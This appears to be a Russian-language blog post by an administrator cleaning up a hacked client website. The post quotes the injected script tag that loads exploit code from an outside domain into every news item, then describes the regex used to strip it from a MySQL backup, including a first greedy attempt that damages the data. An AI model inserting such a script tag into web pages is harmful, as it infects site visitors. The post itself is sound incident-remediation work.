Что за сайт idealvk.msk.ru? Зайдя на 1 из сайтов клиента, обнаружил, что Firefox пытается ограничить доступ к сайту, т.к. считает его небезопасным и распространяющим вредоносные программы.

Полез в исходники и нашел после текста каждой новости вот такой вот текст

<script src="https://idealvk.msk.ru/bbab3ab7bf8ddf63a07cc51429f2e306.js" type="text/javascript"></script>

Какой-то козёл взломал сайт или соседний сайт на аккаунте и поправил в таблице текст всех новостей, добавив к ним этот код. Код кстати этот вызывает эксплойт и пытается загружать на компьютер вирусы. Дорогой кулхацкер — я желаю тебе всяческих болезней и недугов.

Вернемся к делу.

Сделал бекап SQL базы. Запрос с бекапом нужной таблица загнал в Notepad++ и попытался с помощью регулярного выражения удалить сей текст, чтобы загрузить чистую таблицу на сайт.

<script src="https://idealvk.msk.ru/.*.js" type="text/javascript"></script>

Однако, при выполнении бекапа MySQL выдал мне ошибку содержимого. Оказалось в таблице был столбец fullstory и shortstory, в которых соответственно хранились полная и краткая новости. А регулярное выражение сработало не так, ибо было неверно сконфигурировано. Удалилось всё от <script src="https://idealvk.msk.ru/ в первой таблице и до " type="text/javascript"></script> во второй. =) Тоесть запрос шел до последних кавычек в строке.

Естественно вместо 2 столбцов получили 1 и не тот, что нужно.

После некоторых ковыряний в интернете собралось другое регулярное выражение

<script src="[^"]*" type="text/javascript"></script>

Вот оно то и сработало до первой кавычки и все правильно удалило. Загрузил чистую таблицу и принялся искать как гады добрались до таблицы.